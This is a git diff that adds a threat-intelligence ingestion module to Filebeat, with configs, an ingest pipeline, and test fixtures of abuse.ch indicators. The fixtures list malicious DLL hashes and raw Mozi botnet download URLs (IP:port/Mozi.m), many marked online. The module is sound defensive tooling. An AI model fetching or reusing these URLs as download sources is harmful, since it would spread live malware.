"2021-01-14T06:06:13.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 9042, + "related.hash": [ + "07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e", + "6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKk:W5MT4WNaHy9P1FjbrjlKk", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e", + "threatintel.indicator.file.hash.ssdeep": "6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKk:W5MT4WNaHy9P1FjbrjlKk", + "threatintel.indicator.file.hash.tlsh": "6B54CF217A53C826F5E800FCA6E9878914167F346F44A4C773D40F6AA8759E2EF2B317", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 280064, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:52.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 9611, + "related.hash": [ + "708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGo:X5DpBw/KViMTB1MnEWk0115Jj", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGo:X5DpBw/KViMTB1MnEWk0115Jj", + "threatintel.indicator.file.hash.tlsh": "6644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:51.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 10191, + "related.hash": [ + "f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJy:0h3eZgRQCcw+MN54dEq7kqRtoLZM", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.signature": "Heodo", + "threatintel.indicator.file.hash.sha256": "f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJy:0h3eZgRQCcw+MN54dEq7kqRtoLZM", + "threatintel.indicator.file.hash.tlsh": "0754CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:50.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 10783, + "related.hash": [ + "94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Js", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Js", + "threatintel.indicator.file.hash.tlsh": "BB44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:36.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 11363, + "related.hash": [ + "909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJQ:0h3eZgRQCcw+MN54dEq7kqRtoLZ+", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJQ:0h3eZgRQCcw+MN54dEq7kqRtoLZ+", + "threatintel.indicator.file.hash.tlsh": "C554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:16.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 11952, + "related.hash": [ + "d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa", + "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJh:0h3eZgRQCcw+MN54dEq7kqRtoLZ/", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.abusemalware.signature": "Heodo", + "threatintel.indicator.file.hash.sha256": "d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa", + "threatintel.indicator.file.hash.ssdeep": "6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJh:0h3eZgRQCcw+MN54dEq7kqRtoLZ/", + "threatintel.indicator.file.hash.tlsh": "1654CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:15.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 12544, + "related.hash": [ + "3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51", + "6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKS:W5MT4WNaHy9P1FjbrjlKS", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51", + "threatintel.indicator.file.hash.ssdeep": "6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKS:W5MT4WNaHy9P1FjbrjlKS", + "threatintel.indicator.file.hash.tlsh": "5454CF217A53C826F5E800FCA6E9878925167F346F44A4C373D40F6AA8759E2DF2B317", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 280064, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:12.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 13113, + "related.hash": [ + "d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG8:X5DpBw/KViMTB1MnEWk0115Jr", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG8:X5DpBw/KViMTB1MnEWk0115Jr", + "threatintel.indicator.file.hash.tlsh": "6044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:04:38.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 13693, + "related.hash": [ + "8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa", + "6144:X1G3WVIOY6Bdjehj+qudd96ou/6mv5wdC:X1GmSafShjYdd96z/6cwdC", + "ed2860c18f5483e3b5388bad75169dc1" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa", + "threatintel.indicator.file.hash.ssdeep": "6144:X1G3WVIOY6Bdjehj+qudd96ou/6mv5wdC:X1GmSafShjYdd96z/6cwdC", + "threatintel.indicator.file.hash.tlsh": "8D34BE41B28B8B4BD163163C2976D1F8953CFC909761CE693B64B22F0F739D0892E7A5", + "threatintel.indicator.file.pe.imphash": "ed2860c18f5483e3b5388bad75169dc1", + "threatintel.indicator.file.size": 241664, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:04:26.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 14256, + "related.hash": [ + "fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGz:X5DpBw/KViMTB1MnEWk0115JU", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGz:X5DpBw/KViMTB1MnEWk0115JU", + "threatintel.indicator.file.hash.tlsh": "9244D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:04:20.000Z", + "threatintel.indicator.type": "file" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/abuseurl/_meta/fields.yml b/x-pack/filebeat/module/threatintel/abuseurl/_meta/fields.yml new file mode 100644 index 000000000000..a93f91d339c1 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/_meta/fields.yml @@ -0,0 +1,49 @@ +- name: abuseurl + type: group + description: > + Fields for AbuseCH Malware Threat Intel + fields: + - name: id + type: keyword + description: > + The ID of the url. + + - name: urlhaus_reference + type: keyword + description: > + Link to URLhaus entry. + + - name: url_status + type: keyword + description: > + The current status of the URL. Possible values are: online, offline and unknown. + + - name: threat + type: keyword + description: > + The threat corresponding to this malware URL. + + - name: blacklists.surbl + type: keyword + description: > + SURBL blacklist status. Possible values are: listed and not_listed + + - name: blacklists.spamhaus_dbl + type: keyword + description: > + Spamhaus DBL blacklist status. + + - name: reporter + type: keyword + description: > + The Twitter handle of the reporter that has reported this malware URL (or anonymous). + + - name: larted + type: boolean + description: > + Indicates whether the malware URL has been reported to the hosting provider (true or false) + + - name: tags + type: keyword + description: > + A list of tags associated with the queried malware URL diff --git a/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml b/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml new file mode 100644 index 000000000000..0ac7ef6c1432 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml @@ -0,0 +1,42 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +request.method: GET +{{ if .ssl }} + - request.ssl: {{ .ssl | tojson }} +{{ end }} +request.url: {{ .url }} +request.transforms: +- set: + target: header.Content-Type + value: application/json + +response.split: + target: body.urls + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + document_id: "id" + fields: [message] + target: json + - add_fields: + target: '' + fields: + ecs.version: 1.6.0 diff --git a/x-pack/filebeat/module/threatintel/abuseurl/ingest/pipeline.yml b/x-pack/filebeat/module/threatintel/abuseurl/ingest/pipeline.yml new file mode 100644 index 000000000000..ed2ebeda10de --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/ingest/pipeline.yml @@ -0,0 +1,123 @@ +description: Pipeline for parsing Abuse.ch URL Threat Intel +processors: + +#################### +# Event ECS fields # +#################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: enrichment +- set: + field: event.category + value: threat +- set: + field: event.type + value: indicator + +###################### +# General ECS fields # +###################### +- rename: + field: json + target_field: threatintel.abuseurl + ignore_missing: true + +##################### +# Threat ECS Fields # +##################### +- set: + field: threatintel.indicator.type + value: url +- set: + field: threatintel.indicator.url.scheme + value: https + if: ctx?.threatintel?.abuseurl?.url.startsWith('https:') +- set: + field: threatintel.indicator.url.scheme + value: http + if: ctx?.threatintel?.abuseurl?.url.startsWith('http:') +- date: + field: threatintel.abuseurl.date_added + target_field: threatintel.indicator.first_seen + formats: + - "yyyy-MM-dd HH:mm:ss z" + - "yyyy-MM-dd HH:mm:ss Z" + if: "ctx?.threatintel?.abuseurl?.date_added != null" +- uri_parts: + field: threatintel.abuseurl.url + target_field: threatintel.indicator.url + keep_original: true + remove_if_successful: true +- rename: + field: threatintel.abuseurl.url + target_field: threatintel.indicator.url.full + ignore_missing: true + if: ctx?.threatintel?.indicator?.url?.original == null && ctx?.threatintel?.abuseurl?.url != null +- rename: + field: threatintel.abuseurl.host + target_field: threatintel.indicator.domain + ignore_missing: true +- rename: + field: threatintel.abuseurl.urlhaus_reference + target_field: event.reference + ignore_missing: true + + +# Host can be both IP addresses and domain names +- grok: + field: threatintel.abuseurl.host + patterns: + - "(?:%{IP:threatintel.indicator.ip}|%{GREEDYDATA:threatintel.indicator.domain})" + ignore_failure: true +- rename: + field: threatintel.abuseurl.reporter + target_field: threatintel.indicator.provider + ignore_missing: true + +###################### +# Cleanup processors # +###################### +- set: + field: threatintel.indicator.type + value: unknown + if: ctx?.threatintel?.indicator?.type == null +- convert: + field: threatintel.abuseurl.larted + type: boolean + ignore_missing: true +- script: + lang: painless + if: ctx?.threatintel != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); +- remove: + field: + - threatintel.abuseurl.date_added + - message + ignore_missing: true +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml b/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml new file mode 100644 index 000000000000..155e9b4ff3fa --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml @@ -0,0 +1,16 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: interval + default: 60m + - name: url + default: "https://urlhaus-api.abuse.ch/v1/urls/recent/" + - name: ssl + - name: tags + default: [threatintel-abuseurls, forwarded] + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log b/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log new file mode 100644 index 000000000000..e8099fa73aa6 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log @@ -0,0 +1,670 @@ +{"id":"961548","urlhaus_reference":"https://urlhaus.abuse.ch/url/961548/","url":"http://103.72.223.103:34613/Mozi.m","url_status":"online","host":"103.72.223.103","date_added":"2021-01-14 21:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961546","urlhaus_reference":"https://urlhaus.abuse.ch/url/961546/","url":"http://112.30.97.184:44941/Mozi.m","url_status":"online","host":"112.30.97.184","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961547","urlhaus_reference":"https://urlhaus.abuse.ch/url/961547/","url":"http://113.110.198.53:37173/Mozi.m","url_status":"online","host":"113.110.198.53","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961545","urlhaus_reference":"https://urlhaus.abuse.ch/url/961545/","url":"http://101.20.183.170:47545/Mozi.m","url_status":"online","host":"101.20.183.170","date_added":"2021-01-14 21:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961544","urlhaus_reference":"https://urlhaus.abuse.ch/url/961544/","url":"http://59.8.35.22:44782/Mozi.a","url_status":"online","host":"59.8.35.22","date_added":"2021-01-14 21:07:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961543","urlhaus_reference":"https://urlhaus.abuse.ch/url/961543/","url":"http://59.96.37.35:44359/Mozi.a","url_status":"online","host":"59.96.37.35","date_added":"2021-01-14 21:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961540","urlhaus_reference":"https://urlhaus.abuse.ch/url/961540/","url":"http://42.239.233.17:56507/Mozi.m","url_status":"online","host":"42.239.233.17","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961541","urlhaus_reference":"https://urlhaus.abuse.ch/url/961541/","url":"http://58.252.178.20:57562/Mozi.m","url_status":"online","host":"58.252.178.20","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961542","urlhaus_reference":"https://urlhaus.abuse.ch/url/961542/","url":"http://45.176.111.95:48845/Mozi.m","url_status":"online","host":"45.176.111.95","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961539","urlhaus_reference":"https://urlhaus.abuse.ch/url/961539/","url":"http://42.224.68.97:58245/Mozi.m","url_status":"online","host":"42.224.68.97","date_added":"2021-01-14 21:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961538","urlhaus_reference":"https://urlhaus.abuse.ch/url/961538/","url":"http://222.81.144.207:37198/Mozi.m","url_status":"online","host":"222.81.144.207","date_added":"2021-01-14 21:06:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961537","urlhaus_reference":"https://urlhaus.abuse.ch/url/961537/","url":"http://182.127.185.137:33524/Mozi.m","url_status":"online","host":"182.127.185.137","date_added":"2021-01-14 21:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961531","urlhaus_reference":"https://urlhaus.abuse.ch/url/961531/","url":"http://39.84.175.185:48261/Mozi.a","url_status":"online","host":"39.84.175.185","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961532","urlhaus_reference":"https://urlhaus.abuse.ch/url/961532/","url":"http://27.41.11.238:34478/Mozi.m","url_status":"online","host":"27.41.11.238","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961533","urlhaus_reference":"https://urlhaus.abuse.ch/url/961533/","url":"http://182.127.133.68:35703/Mozi.a","url_status":"online","host":"182.127.133.68","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961534","urlhaus_reference":"https://urlhaus.abuse.ch/url/961534/","url":"http://27.46.44.102:48666/Mozi.m","url_status":"online","host":"27.46.44.102","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961535","urlhaus_reference":"https://urlhaus.abuse.ch/url/961535/","url":"http://39.70.88.65:53923/Mozi.m","url_status":"online","host":"39.70.88.65","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961536","urlhaus_reference":"https://urlhaus.abuse.ch/url/961536/","url":"http://42.224.136.237:52794/Mozi.m","url_status":"online","host":"42.224.136.237","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961530","urlhaus_reference":"https://urlhaus.abuse.ch/url/961530/","url":"http://117.208.135.63:49312/Mozi.a","url_status":"offline","host":"117.208.135.63","date_added":"2021-01-14 21:05:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961525","urlhaus_reference":"https://urlhaus.abuse.ch/url/961525/","url":"http://125.47.66.60:38961/Mozi.m","url_status":"online","host":"125.47.66.60","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961526","urlhaus_reference":"https://urlhaus.abuse.ch/url/961526/","url":"http://182.117.95.148:50420/Mozi.a","url_status":"online","host":"182.117.95.148","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961527","urlhaus_reference":"https://urlhaus.abuse.ch/url/961527/","url":"http://117.202.71.48:55007/Mozi.m","url_status":"online","host":"117.202.71.48","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961528","urlhaus_reference":"https://urlhaus.abuse.ch/url/961528/","url":"http://125.99.132.118:51143/Mozi.m","url_status":"online","host":"125.99.132.118","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961529","urlhaus_reference":"https://urlhaus.abuse.ch/url/961529/","url":"http://182.114.123.69:41003/Mozi.m","url_status":"online","host":"182.114.123.69","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961524","urlhaus_reference":"https://urlhaus.abuse.ch/url/961524/","url":"http://116.19.127.37:35739/Mozi.m","url_status":"offline","host":"116.19.127.37","date_added":"2021-01-14 21:04:38 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961523","urlhaus_reference":"https://urlhaus.abuse.ch/url/961523/","url":"http://42.239.253.55:45653/Mozi.m","url_status":"offline","host":"42.239.253.55","date_added":"2021-01-14 21:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} 